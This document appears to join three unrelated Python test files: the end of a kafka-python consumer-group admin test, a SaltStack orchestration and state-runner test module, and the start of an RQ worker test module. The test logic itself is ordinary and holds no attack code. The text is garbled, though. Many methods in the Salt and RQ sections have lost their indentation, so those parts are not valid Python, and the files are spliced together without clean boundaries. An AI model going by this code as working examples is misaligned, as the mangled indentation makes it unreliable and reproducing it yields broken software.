                # NOTE(review): any() is satisfied when a single group has a
                # stable generation; presumably this should be all() so BOTH
                # groups must be stable — confirm against upstream intent.
                is_same_generation = any([len(consumer_generation) == 1 for consumer_generation in generations.values()])
                # New generation assignment is not complete until
                # coordinator.rejoining = False
                rejoining = any([consumer._coordinator.rejoining
                                 for consumer in list(consumers.values())])
                if not rejoining and is_same_generation:
                    break
                else:
                    sleep(1)
            assert time() < timeout, "timeout waiting for assignments"
        info('Group stabilized; verifying assignment')
        output = kafka_admin_client.describe_consumer_groups(group_id_list)
        assert len(output) == 2
        consumer_groups = set()
        for consumer_group in output:
            assert(consumer_group.group in group_id_list)
            if consumer_group.group == group_id_list[0]:
                assert(len(consumer_group.members) == 2)
            else:
                assert(len(consumer_group.members) == 1)
            for member in consumer_group.members:
                assert(member.member_metadata.subscription[0] == topic)
                assert(member.member_assignment.assignment[0][0] == topic)
            consumer_groups.add(consumer_group.group)
        assert(sorted(list(consumer_groups)) == group_id_list)
    finally:
        info('Shutting down %s consumers', num_consumers)
        for c in range(num_consumers):
            info('Stopping consumer %s', c)
            stop[c].set()
            threads[c].join()
            threads[c] = None
@pytest.mark.skipif(env_kafka_version() < (1, 1), reason="Delete consumer groups requires broker >=1.1")
def test_delete_consumergroups(kafka_admin_client, kafka_consumer_factory, send_messages):
    """Deleting two empty consumer groups succeeds and leaves the third intact."""
    random_group_id = 'test-group-' + random_string(6)
    group1 = random_group_id + "_1"
    group2 = random_group_id + "_2"
    group3 = random_group_id + "_3"
    send_messages(range(0, 100), partition=0)
    # Let each group consume one message, then close so the groups are empty.
    for group in (group1, group2, group3):
        consumer = kafka_consumer_factory(group_id=group)
        next(consumer)
        consumer.close()
    consumergroups = {group_id for group_id, _ in kafka_admin_client.list_consumer_groups()}
    assert group1 in consumergroups
    assert group2 in consumergroups
    assert group3 in consumergroups
    delete_results = {
        group_id: error
        for group_id, error in kafka_admin_client.delete_consumer_groups([group1, group2])
    }
    assert delete_results[group1] == NoError
    assert delete_results[group2] == NoError
    # group3 was not requested for deletion, so no result entry for it.
    assert group3 not in delete_results
    consumergroups = {group_id for group_id, _ in kafka_admin_client.list_consumer_groups()}
    assert group1 not in consumergroups
    assert group2 not in consumergroups
    assert group3 in consumergroups
@pytest.mark.skipif(env_kafka_version() < (1, 1), reason="Delete consumer groups requires broker >=1.1")
def test_delete_consumergroups_with_errors(kafka_admin_client, kafka_consumer_factory, send_messages):
    """Mixed delete results: empty group deletes; active and unknown groups error."""
    random_group_id = 'test-group-' + random_string(6)
    group1 = random_group_id + "_1"
    group2 = random_group_id + "_2"
    group3 = random_group_id + "_3"
    send_messages(range(0, 100), partition=0)
    consumer1 = kafka_consumer_factory(group_id=group1)
    next(consumer1)
    consumer1.close()
    # group2's consumer is intentionally left open so the group stays non-empty.
    consumer2 = kafka_consumer_factory(group_id=group2)
    next(consumer2)
    before = {group_id for group_id, _ in kafka_admin_client.list_consumer_groups()}
    assert group1 in before
    assert group2 in before
    assert group3 not in before
    delete_results = {
        group_id: error
        for group_id, error in kafka_admin_client.delete_consumer_groups([group1, group2, group3])
    }
    assert delete_results[group1] == NoError
    assert delete_results[group2] == NonEmptyGroupError
    assert delete_results[group3] == GroupIdNotFoundError
    after = {group_id for group_id, _ in kafka_admin_client.list_consumer_groups()}
    assert group1 not in after
    assert group2 in after
    assert group3 not in after
|
test_state.py | """
Tests for the state runner
"""
import errno
import logging
import os
import queue
import shutil
import signal
import tempfile
import textwrap
import threading
import time
import salt.exceptions
import salt.utils.event
import salt.utils.files
import salt.utils.json
import salt.utils.platform
import salt.utils.stringutils
import salt.utils.yaml
from tests.support.case import ShellCase
from tests.support.helpers import expensiveTest, flaky, slowTest
from tests.support.mock import MagicMock, patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import skipIf
log = logging.getLogger(__name__)
@flaky
class StateRunnerTest(ShellCase):
"""
Test the state runner.
"""
RUN_TIMEOUT = 300
def add_to_queue(self, q, cmd):
"""
helper method to add salt-run
return data to a queue
"""
ret = self.run_run(cmd)
q.put(ret)
q.task_done()
@slowTest
def test_orchestrate_output(self):
"""
Ensure the orchestrate runner outputs useful state data.
In Issue #31330, the output only contains ['outputter:', ' highstate'],
and not the full stateful return. This tests ensures we don't regress in that
manner again.
Also test against some sample "good" output that would be included in a correct
orchestrate run.
"""
ret_output = self.run_run("state.orchestrate orch.simple")
bad_out = ["outputter:", " highstate"]
good_out = [
" Function: salt.state",
" Result: True",
"Succeeded: 1 (changed=1)",
"Failed: 0",
"Total states run: 1",
]
# First, check that we don't have the "bad" output that was displaying in
# Issue #31330 where only the highstate outputter was listed
assert bad_out != ret_output
# Now test that some expected good sample output is present in the return.
for item in good_out:
assert item in ret_output
@slowTest
def test_orchestrate_nested(self):
"""
test salt-run state.orchestrate and failhard with nested orchestration
"""
if os.path.exists("/tmp/ewu-2016-12-13"):
os.remove("/tmp/ewu-2016-12-13")
_, code = self.run_run("state.orchestrate nested-orch.outer", with_retcode=True)
assert os.path.exists("/tmp/ewu-2016-12-13") is False
assert code != 0
@slowTest
def test_orchestrate_with_mine(self):
"""
test salt-run state.orchestrate with mine.get call in sls
"""
fail_time = time.time() + 120
self.run_run('mine.update "*"')
exp_ret = "Succeeded: 1 (changed=1)"
while True:
ret = self.run_run("state.orchestrate orch.mine")
try:
assert exp_ret in ret
break
except AssertionError:
if time.time() > fail_time:
self.fail(
'"{}" was not found in the orchestration call'.format(exp_ret)
)
    @slowTest
    def test_orchestrate_state_and_function_failure(self):
        """
        Ensure that returns from failed minions are in the changes dict where
        they belong, so they can be programatically analyzed.
        See https://github.com/saltstack/salt/issues/43204
        """
        # Sync custom modules to the minions before orchestrating.
        self.run_run("saltutil.sync_modules")
        ret = salt.utils.json.loads(
            "\n".join(self.run_run("state.orchestrate orch.issue43204 --out=json"))
        )
        # Drill down to the changes dict
        state_ret = ret["data"]["master"]["salt_|-Step01_|-Step01_|-state"]["changes"]
        func_ret = ret["data"]["master"][
            "salt_|-Step02_|-runtests_helpers.nonzero_retcode_return_false_|-function"
        ]["changes"]
        # Remove duration and start time from the results, since they would
        # vary with each run and that would make it impossible to test.
        for item in ("duration", "start_time"):
            state_ret["ret"]["minion"][
                "test_|-test fail with changes_|-test fail with changes_|-fail_with_changes"
            ].pop(item)
        # The failed state's full return must appear under "changes".
        self.assertEqual(
            state_ret,
            {
                "out": "highstate",
                "ret": {
                    "minion": {
                        "test_|-test fail with changes_|-test fail with changes_|-fail_with_changes": {
                            "__id__": "test fail with changes",
                            "__run_num__": 0,
                            "__sls__": "orch.issue43204.fail_with_changes",
                            "changes": {
                                "testing": {
                                    "new": "Something pretended to change",
                                    "old": "Unchanged",
                                }
                            },
                            "comment": "Failure!",
                            "name": "test fail with changes",
                            "result": False,
                        }
                    }
                },
            },
        )
        # The failed function's return (False) must likewise be in "changes".
        self.assertEqual(func_ret, {"out": "highstate", "ret": {"minion": False}})
@slowTest
def test_orchestrate_target_exists(self):
"""
test orchestration when target exists
while using multiple states
"""
ret = self.run_run("state.orchestrate orch.target-exists")
first = [" ID: core", " Function: salt.state", " Result: True"]
second = [
" ID: test-state",
" Function: salt.state",
" Result: True",
]
third = [
" ID: cmd.run",
" Function: salt.function",
" Result: True",
]
ret_out = [first, second, third]
for out in ret_out:
for item in out:
assert item in ret
    @slowTest
    def test_orchestrate_retcode(self):
        """
        Test orchestration with nonzero retcode set in __context__
        """
        # Sync the custom runner/wheel helpers to the master first.
        self.run_run("saltutil.sync_runners")
        self.run_run("saltutil.sync_wheel")
        ret = "\n".join(self.run_run("state.orchestrate orch.retcode"))
        # Each entry is a multi-line fragment (adjacent string literals join)
        # covering success and failure for both salt.runner and salt.wheel.
        for result in (
            " ID: test_runner_success\n"
            " Function: salt.runner\n"
            " Name: runtests_helpers.success\n"
            " Result: True",
            " ID: test_runner_failure\n"
            " Function: salt.runner\n"
            " Name: runtests_helpers.failure\n"
            " Result: False",
            " ID: test_wheel_success\n"
            " Function: salt.wheel\n"
            " Name: runtests_helpers.success\n"
            " Result: True",
            " ID: test_wheel_failure\n"
            " Function: salt.wheel\n"
            " Name: runtests_helpers.failure\n"
            " Result: False",
        ):
            self.assertIn(result, ret)
    @slowTest
    def test_orchestrate_target_does_not_exist(self):
        """
        test orchestration when target doesn't exist
        while using multiple states
        """
        ret = self.run_run("state.orchestrate orch.target-does-not-exist")
        # The first stanza targets a nonexistent minion and must fail with the
        # "No minions matched" message; the later stanzas must still run.
        first = [
            "No minions matched the target. No command was sent, no jid was assigned.",
            " ID: core",
            " Function: salt.state",
            " Result: False",
        ]
        second = [
            " ID: test-state",
            " Function: salt.state",
            " Result: True",
        ]
        third = [
            " ID: cmd.run",
            " Function: salt.function",
            " Result: True",
        ]
        ret_out = [first, second, third]
        for out in ret_out:
            for item in out:
                assert item in ret
    @slowTest
    def test_orchestrate_batch_with_failhard_error(self):
        """
        test orchestration properly stops with failhard and batch.
        """
        ret = self.run_run("state.orchestrate orch.batch --out=json -l critical")
        ret_json = salt.utils.json.loads("\n".join(ret))
        retcode = ret_json["retcode"]
        result = ret_json["data"]["master"][
            "salt_|-call_fail_state_|-call_fail_state_|-state"
        ]["result"]
        changes = ret_json["data"]["master"][
            "salt_|-call_fail_state_|-call_fail_state_|-state"
        ]["changes"]
        # Looks like there is a platform differences in execution.
        # I see empty changes dict in MacOS for some reason. Maybe it's a bug?
        # NOTE: changes_ret is only bound when changes is truthy; the assertion
        # below is guarded by the same condition, so this cannot raise
        # UnboundLocalError.
        if changes:
            changes_ret = changes["ret"]
        # Debug
        print("Retcode: {}".format(retcode))
        print("Changes: {}".format(changes))
        print("Result: {}".format(result))
        assert retcode != 0
        assert result is False
        if changes:
            # The execution should stop after first error, so return dict should contain only one minion
            assert len(changes_ret) == 1
@slowTest
def test_state_event(self):
"""
test to ensure state.event
runner returns correct data
"""
q = queue.Queue(maxsize=0)
cmd = "state.event salt/job/*/new count=1"
expect = '"minions": ["minion"]'
server_thread = threading.Thread(target=self.add_to_queue, args=(q, cmd))
server_thread.setDaemon(True)
server_thread.start()
while q.empty():
self.run_salt("minion test.ping --static")
out = q.get()
assert expect in str(out)
server_thread.join()
@slowTest
def test_orchestrate_subset(self):
"""
test orchestration state using subset
"""
ret = self.run_run("state.orchestrate orch.subset", timeout=500)
def count(thing, listobj):
return sum([obj.strip() == thing for obj in listobj])
assert count("ID: test subset", ret) == 1
assert count("Succeeded: 1", ret) == 1
assert count("Failed: 0", ret) == 1
    @slowTest
    def test_orchestrate_salt_function_return_false_failure(self):
        """
        Ensure that functions that only return False in the return
        are flagged as failed when run as orchestrations.

        See https://github.com/saltstack/salt/issues/30367
        """
        self.run_run("saltutil.sync_modules")
        ret = salt.utils.json.loads(
            "\n".join(self.run_run("state.orchestrate orch.issue30367 --out=json"))
        )
        # Drill down to the changes dict
        state_result = ret["data"]["master"][
            "salt_|-deploy_check_|-test.false_|-function"
        ]["result"]
        func_ret = ret["data"]["master"]["salt_|-deploy_check_|-test.false_|-function"][
            "changes"
        ]
        # A bare-False function return must mark the orchestration step failed
        # while still recording the raw return under changes.
        assert state_result is False
        self.assertEqual(func_ret, {"out": "highstate", "ret": {"minion": False}})
@skipIf(salt.utils.platform.is_windows(), "*NIX-only test")
@flaky
class OrchEventTest(ShellCase):
"""
Tests for orchestration events
"""
RUN_TIMEOUT = 300
    def setUp(self):
        """
        Create a throwaway master.d conf file and a temporary file_roots base
        environment, and register cleanups that undo both.
        """
        self.timeout = 60
        self.master_d_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master.d")
        try:
            os.makedirs(self.master_d_dir)
        except OSError as exc:
            # The directory may already exist from a previous test; anything
            # else is a real failure.
            if exc.errno != errno.EEXIST:
                raise
        self.conf = tempfile.NamedTemporaryFile(
            mode="w", suffix=".conf", dir=self.master_d_dir, delete=True,
        )
        self.base_env = tempfile.mkdtemp(dir=RUNTIME_VARS.TMP)
        self.addCleanup(shutil.rmtree, self.base_env)
        self.addCleanup(self.conf.close)
        for attr in ("timeout", "master_d_dir", "conf", "base_env"):
            self.addCleanup(delattr, self, attr)
        # Force a reload of the configuration now that our temp config file has
        # been removed.
        self.addCleanup(self.run_run_plus, "test.arg")
    def alarm_handler(self, signal, frame):
        # SIGALRM handler installed by the tests to abort a hung event wait.
        # NOTE(review): the ``signal`` parameter shadows the ``signal`` module
        # inside this method; rename to ``signum`` if the module is ever
        # needed here.
        raise Exception("Timeout of {} seconds reached".format(self.timeout))
def write_conf(self, data):
"""
Dump the config dict to the conf file
"""
self.conf.write(salt.utils.yaml.safe_dump(data, default_flow_style=False))
self.conf.flush()
    @expensiveTest
    def test_jid_in_ret_event(self):
        """
        Test to confirm that the ret event for the orchestration contains the
        jid for the jobs spawned.
        """
        self.write_conf(
            {"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
        )
        # A trivial state for the salt.state stanza to apply.
        state_sls = os.path.join(self.base_env, "test_state.sls")
        with salt.utils.files.fopen(state_sls, "w") as fp_:
            fp_.write(
                salt.utils.stringutils.to_str(
                    textwrap.dedent(
                        """
                        date:
                          cmd.run
                        """
                    )
                )
            )
        # The orchestration exercises all four job types: state, function,
        # runner and wheel — each should carry a __jid__ in the ret event.
        orch_sls = os.path.join(self.base_env, "test_orch.sls")
        with salt.utils.files.fopen(orch_sls, "w") as fp_:
            fp_.write(
                salt.utils.stringutils.to_str(
                    textwrap.dedent(
                        """
                        date_cmd:
                          salt.state:
                            - tgt: minion
                            - sls: test_state

                        ping_minion:
                          salt.function:
                            - name: test.ping
                            - tgt: minion

                        fileserver.file_list:
                          salt.runner

                        config.values:
                          salt.wheel
                        """
                    )
                )
            )
        listener = salt.utils.event.get_event(
            "master",
            sock_dir=self.master_opts["sock_dir"],
            transport=self.master_opts["transport"],
            opts=self.master_opts,
        )
        jid = self.run_run_plus("state.orchestrate", "test_orch").get("jid")
        if jid is None:
            raise Exception("jid missing from run_run_plus output")
        # Guard against a missing ret event hanging the test forever.
        signal.signal(signal.SIGALRM, self.alarm_handler)
        signal.alarm(self.timeout)
        try:
            while True:
                event = listener.get_event(full=True)
                if event is None:
                    continue
                if event["tag"] == "salt/run/{}/ret".format(jid):
                    # Don't wrap this in a try/except. We want to know if the
                    # data structure is different from what we expect!
                    ret = event["data"]["return"]["data"]["master"]
                    for job in ret:
                        self.assertTrue("__jid__" in ret[job])
                    break
        finally:
            del listener
            signal.alarm(0)
@expensiveTest
def test_parallel_orchestrations(self):
"""
Test to confirm that the parallel state requisite works in orch
we do this by running 10 test.sleep's of 10 seconds, and insure it only takes roughly 10s
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
orch_sls = os.path.join(self.base_env, "test_par_orch.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
{% for count in range(1, 20) %}
sleep {{ count }}:
module.run:
- name: test.sleep
- length: 10
- parallel: True
{% endfor %}
sleep 21:
module.run:
- name: test.sleep
- length: 10
- parallel: True
- require:
- module: sleep 1
"""
)
)
orch_sls = os.path.join(self.base_env, "test_par_orch.sls")
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
start_time = time.time()
jid = self.run_run_plus("state.orchestrate", "test_par_orch").get("jid")
if jid is None:
raise Exception("jid missing from run_run_plus output")
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
received = False
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
# if we receive the ret for this job before self.timeout (60),
# the test is implicitly successful; if it were happening in serial it would be
# atleast 110 seconds.
if event["tag"] == "salt/run/{}/ret".format(jid):
received = True
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event["data"]["return"]["data"]["master"]
for state in ret:
data = ret[state]
# we expect each duration to be greater than 10s
self.assertTrue(data["duration"] > 10000)
break
# self confirm that the total runtime is roughly 30s (left 10s for buffer)
self.assertTrue((time.time() - start_time) < 40)
finally:
self.assertTrue(received)
del listener
signal.alarm(0)
    @expensiveTest
    def test_orchestration_soft_kill(self):
        """
        Test that state.soft_kill registered against a jid prevents later
        stages of that orchestration from running.
        """
        self.write_conf(
            {"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
        )
        orch_sls = os.path.join(self.base_env, "two_stage_orch_kill.sls")
        with salt.utils.files.fopen(orch_sls, "w") as fp_:
            fp_.write(
                textwrap.dedent(
                    """
                    stage_one:
                      test.succeed_without_changes

                    stage_two:
                      test.fail_without_changes
                    """
                )
            )
        listener = salt.utils.event.get_event(
            "master",
            sock_dir=self.master_opts["sock_dir"],
            transport=self.master_opts["transport"],
            opts=self.master_opts,
        )
        mock_jid = "20131219120000000000"
        # Pre-register the soft kill for the jid the orchestration will get,
        # then pin jid generation so the run actually uses that jid.
        self.run_run("state.soft_kill {} stage_two".format(mock_jid))
        with patch("salt.utils.jid.gen_jid", MagicMock(return_value=mock_jid)):
            jid = self.run_run_plus("state.orchestrate", "two_stage_orch_kill").get(
                "jid"
            )
        if jid is None:
            raise Exception("jid missing from run_run_plus output")
        # Guard against a missing ret event hanging the test forever.
        signal.signal(signal.SIGALRM, self.alarm_handler)
        signal.alarm(self.timeout)
        received = False
        try:
            while True:
                event = listener.get_event(full=True)
                if event is None:
                    continue
                # Ensure that stage_two of the state does not run
                if event["tag"] == "salt/run/{}/ret".format(jid):
                    received = True
                    # Don't wrap this in a try/except. We want to know if the
                    # data structure is different from what we expect!
                    ret = event["data"]["return"]["data"]["master"]
                    self.assertNotIn(
                        "test_|-stage_two_|-stage_two_|-fail_without_changes", ret
                    )
                    break
        finally:
            self.assertTrue(received)
            del listener
            signal.alarm(0)
@slowTest
def test_orchestration_with_pillar_dot_items(self):
"""
Test to confirm when using a state file that includes other state file, if
one of those state files includes pillar related functions that will not
be pulling from the pillar cache that all the state files are available and
the file_roots has been preserved. See issues #48277 and #46986.
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
orch_sls = os.path.join(self.base_env, "main.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
include:
- one
- two
- three
"""
)
)
orch_sls = os.path.join(self.base_env, "one.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
{%- set foo = salt['saltutil.runner']('pillar.show_pillar') %}
placeholder_one:
test.succeed_without_changes
"""
)
)
orch_sls = os.path.join(self.base_env, "two.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
placeholder_two:
test.succeed_without_changes
"""
)
)
orch_sls = os.path.join(self.base_env, "three.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
placeholder_three:
test.succeed_without_changes
"""
)
)
orch_sls = os.path.join(self.base_env, "main.sls")
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
jid = self.run_run_plus("state.orchestrate", "main").get("jid")
if jid is None:
raise salt.exceptions.SaltInvocationError(
"jid missing from run_run_plus output"
)
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
received = False
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event.get("tag", "") == "salt/run/{}/ret".format(jid):
received = True
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event["data"]["return"]["data"]["master"]
for state in ret:
data = ret[state]
# Each state should be successful
self.assertEqual(data["comment"], "Success!")
break
finally:
self.assertTrue(received)
del listener
signal.alarm(0)
    @slowTest
    def test_orchestration_onchanges_and_prereq(self):
        """
        Test that onchanges and prereq requisites between orchestration
        stanzas fire only when the watched state reports changes: None results
        in the first test-mode run (changes pending), True results in a
        test-mode run after the file already exists (no changes).
        """
        self.write_conf(
            {"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
        )
        orch_sls = os.path.join(self.base_env, "orch.sls")
        with salt.utils.files.fopen(orch_sls, "w") as fp_:
            fp_.write(
                textwrap.dedent(
                    """
                    manage_a_file:
                      salt.state:
                        - tgt: minion
                        - sls:
                          - orch.req_test

                    do_onchanges:
                      salt.function:
                        - tgt: minion
                        - name: test.ping
                        - onchanges:
                          - salt: manage_a_file

                    do_prereq:
                      salt.function:
                        - tgt: minion
                        - name: test.ping
                        - prereq:
                          - salt: manage_a_file
                    """
                )
            )
        listener = salt.utils.event.get_event(
            "master",
            sock_dir=self.master_opts["sock_dir"],
            transport=self.master_opts["transport"],
            opts=self.master_opts,
        )
        try:
            jid1 = self.run_run_plus("state.orchestrate", "orch", test=True).get("jid")
            # Run for real to create the file
            self.run_run_plus("state.orchestrate", "orch").get("jid")
            # Run again in test mode. Since there were no changes, the
            # requisites should not fire.
            jid2 = self.run_run_plus("state.orchestrate", "orch", test=True).get("jid")
        finally:
            try:
                os.remove(os.path.join(RUNTIME_VARS.TMP, "orch.req_test"))
            except OSError:
                pass
        assert jid1 is not None
        assert jid2 is not None
        tags = {"salt/run/{}/ret".format(x): x for x in (jid1, jid2)}
        ret = {}
        # Guard against a missing ret event hanging the test forever.
        signal.signal(signal.SIGALRM, self.alarm_handler)
        signal.alarm(self.timeout)
        try:
            while True:
                event = listener.get_event(full=True)
                if event is None:
                    continue
                if event["tag"] in tags:
                    ret[tags.pop(event["tag"])] = self.repack_state_returns(
                        event["data"]["return"]["data"]["master"]
                    )
                    if not tags:
                        # If tags is empty, we've grabbed all the returns we
                        # wanted, so let's stop listening to the event bus.
                        break
        finally:
            del listener
            signal.alarm(0)
        for sls_id in ("manage_a_file", "do_onchanges", "do_prereq"):
            # The first time through, all three states should have a None
            # result, while the second time through, they should all have a
            # True result.
            assert (
                ret[jid1][sls_id]["result"] is None
            ), "result of {} ({}) is not None".format(
                sls_id, ret[jid1][sls_id]["result"]
            )
            assert (
                ret[jid2][sls_id]["result"] is True
            ), "result of {} ({}) is not True".format(
                sls_id, ret[jid2][sls_id]["result"]
            )
        # The file.managed state should have shown changes in the test mode
        # return data.
        assert ret[jid1]["manage_a_file"]["changes"]
        # After the file was created, running again in test mode should have
        # shown no changes.
        assert not ret[jid2]["manage_a_file"]["changes"], ret[jid2]["manage_a_file"][
            "changes"
        ]
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import os
import shutil
import signal
import subprocess
import sys
import time
import zlib
from datetime import datetime, timedelta
from multiprocessing import Process
from time import sleep
from unittest import skipIf
import pytest
import mock
from mock import Mock
from tests import RQTestCase, slow
from tests.fixtures import (
access_self, create_file, create_file_after_timeout, div_by_zero, do_nothing,
kill_worker, long_running_job, modify_self, modify_self_and_error,
run_dummy_heroku_worker, save_key_ttl, say_hello, say_pid,
)
from rq import Queue, SimpleWorker, Worker, get_current_connection
from rq.compat import as_text, PY2
from rq.job import Job, JobStatus
from rq.registry import StartedJobRegistry, FailedJobRegistry, FinishedJobRegistry
from rq.suspension import resume, suspend
from rq.utils import utcnow
from rq.version import VERSION
from rq.worker import HerokuWorker, WorkerStatus
class CustomJob(Job):
    """Minimal Job subclass used to verify the worker's job_class plumbing."""
    pass
class CustomQueue(Queue):
    """Minimal Queue subclass used to verify the worker's queue_class plumbing."""
    pass
class TestWorker(RQTestCase):
    def test_create_worker(self):
        """Worker creation using various inputs.

        Accepts a queue name, a list/iterable of names, Queue instances,
        byte strings on Python 2, and an optional serializer.
        """
        # With single string argument
        w = Worker('foo')
        self.assertEqual(w.queues[0].name, 'foo')
        # With list of strings
        w = Worker(['foo', 'bar'])
        self.assertEqual(w.queues[0].name, 'foo')
        self.assertEqual(w.queues[1].name, 'bar')
        self.assertEqual(w.queue_keys(), [w.queues[0].key, w.queues[1].key])
        self.assertEqual(w.queue_names(), ['foo', 'bar'])
        # With iterable of strings
        w = Worker(iter(['foo', 'bar']))
        self.assertEqual(w.queues[0].name, 'foo')
        self.assertEqual(w.queues[1].name, 'bar')
        # Also accept byte strings in Python 2
        if PY2:
            # With single byte string argument
            w = Worker(b'foo')
            self.assertEqual(w.queues[0].name, 'foo')
            # With list of byte strings
            w = Worker([b'foo', b'bar'])
            self.assertEqual(w.queues[0].name, 'foo')
            self.assertEqual(w.queues[1].name, 'bar')
            # With iterable of byte strings
            w = Worker(iter([b'foo', b'bar']))
            self.assertEqual(w.queues[0].name, 'foo')
            self.assertEqual(w.queues[1].name, 'bar')
        # With single Queue
        w = Worker(Queue('foo'))
        self.assertEqual(w.queues[0].name, 'foo')
        # With iterable of Queues
        w = Worker(iter([Queue('foo'), Queue('bar')]))
        self.assertEqual(w.queues[0].name, 'foo')
        self.assertEqual(w.queues[1].name, 'bar')
        # With list of Queues
        w = Worker([Queue('foo'), Queue('bar')])
        self.assertEqual(w.queues[0].name, 'foo')
        self.assertEqual(w.queues[1].name, 'bar')
        # With string and serializer
        w = Worker('foo', serializer=json)
        self.assertEqual(w.queues[0].name, 'foo')
        # With queue having serializer
        w = Worker(Queue('foo'), serializer=json)
        self.assertEqual(w.queues[0].name, 'foo')
def test_work_and_quit(self):
"""Worker processes work, then quits."""
fooq, barq = Queue('foo'), Queue('bar')
w = Worker([fooq, barq])
self.assertEqual(
w.work(burst=True), False,
'Did not expect any work on the queue.'
)
fooq.enqueue(say_hello, name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
    def test_worker_all(self):
        """Worker.all() works properly"""
        foo_queue = Queue('foo')
        bar_queue = Queue('bar')
        w1 = Worker([foo_queue, bar_queue], name='w1')
        w1.register_birth()
        w2 = Worker([foo_queue], name='w2')
        w2.register_birth()
        # By connection: both registered workers are visible.
        self.assertEqual(
            set(Worker.all(connection=foo_queue.connection)),
            set([w1, w2])
        )
        # By queue: only workers listening on that queue are returned.
        self.assertEqual(set(Worker.all(queue=foo_queue)), set([w1, w2]))
        self.assertEqual(set(Worker.all(queue=bar_queue)), set([w1]))
        w1.register_death()
        w2.register_death()
    def test_find_by_key(self):
        """Worker.find_by_key restores queues, state and job_id."""
        queues = [Queue('foo'), Queue('bar')]
        w = Worker(queues)
        # NOTE(review): death is registered before birth here; presumably to
        # start from a clean key — confirm against Worker.register_* semantics.
        w.register_death()
        w.register_birth()
        w.set_state(WorkerStatus.STARTED)
        worker = Worker.find_by_key(w.key)
        self.assertEqual(worker.queues, queues)
        self.assertEqual(worker.get_state(), WorkerStatus.STARTED)
        self.assertEqual(worker._job_id, None)
        self.assertTrue(worker.key in Worker.all_keys(worker.connection))
        self.assertEqual(worker.version, VERSION)
        # If worker is gone, its keys should also be removed
        worker.connection.delete(worker.key)
        Worker.find_by_key(worker.key)
        self.assertFalse(worker.key in Worker.all_keys(worker.connection))
        # A key that is not a worker key at all raises ValueError.
        self.assertRaises(ValueError, Worker.find_by_key, 'foo')
def test_worker_ttl(self):
"""Worker ttl."""
w = Worker([])
w.register_birth()
[worker_key] = self.testconn.smembers(Worker.redis_workers_keys)
self.assertIsNotNone(self.testconn.ttl(worker_key))
w.register_death()
def test_work_via_string_argument(self):
"""Worker processes work fed via string arguments."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Frank!')
    def test_job_times(self):
        """job times are set correctly."""
        q = Queue('foo')
        w = Worker([q])
        before = utcnow()
        # Truncate to whole seconds so sub-second clock skew cannot make
        # ``before`` land after enqueued_at.
        before = before.replace(microsecond=0)
        job = q.enqueue(say_hello)
        self.assertIsNotNone(job.enqueued_at)
        self.assertIsNone(job.started_at)
        self.assertIsNone(job.ended_at)
        self.assertEqual(
            w.work(burst=True), True,
            'Expected at least some work done.'
        )
        self.assertEqual(job.result, 'Hi there, Stranger!')
        after = utcnow()
        job.refresh()
        # All three timestamps must fall within the test's time window.
        self.assertTrue(
            before <= job.enqueued_at <= after,
            'Not %s <= %s <= %s' % (before, job.enqueued_at, after)
        )
        self.assertTrue(
            before <= job.started_at <= after,
            'Not %s <= %s <= %s' % (before, job.started_at, after)
        )
        self.assertTrue(
            before <= job.ended_at <= after,
            'Not %s <= %s <= %s' % (before, job.ended_at, after)
        )
    def test_work_is_unreadable(self):
        """Unreadable jobs are put on the failed job registry."""
        q = Queue()
        self.assertEqual(q.count, 0)
        # NOTE: We have to fake this enqueueing for this test case.
        # What we're simulating here is a call to a function that is not
        # importable from the worker process.
        job = Job.create(func=div_by_zero, args=(3,), origin=q.name)
        job.save()
        # Corrupt the serialized payload so the worker cannot import the
        # referenced function.
        job_data = job.data
        invalid_data = job_data.replace(b'div_by_zero', b'nonexisting')
        assert job_data != invalid_data
        self.testconn.hset(job.key, 'data', zlib.compress(invalid_data))
        # We use the low-level internal function to enqueue any data (bypassing
        # validity checks)
        q.push_job_id(job.id)
        self.assertEqual(q.count, 1)
        # All set, we're going to process it
        w = Worker([q])
        w.work(burst=True)  # should silently pass
        self.assertEqual(q.count, 0)
        failed_job_registry = FailedJobRegistry(queue=q)
        self.assertTrue(job in failed_job_registry)
    def test_heartbeat(self):
        """Heartbeat saves last_heartbeat"""
        q = Queue()
        w = Worker([q])
        w.register_birth()
        # Birth registration records pid, hostname, birth and last_heartbeat
        # in the worker's Redis hash.
        self.assertEqual(str(w.pid), as_text(self.testconn.hget(w.key, 'pid')))
        self.assertEqual(w.hostname,
                         as_text(self.testconn.hget(w.key, 'hostname')))
        last_heartbeat = self.testconn.hget(w.key, 'last_heartbeat')
        self.assertIsNotNone(self.testconn.hget(w.key, 'birth'))
        self.assertTrue(last_heartbeat is not None)
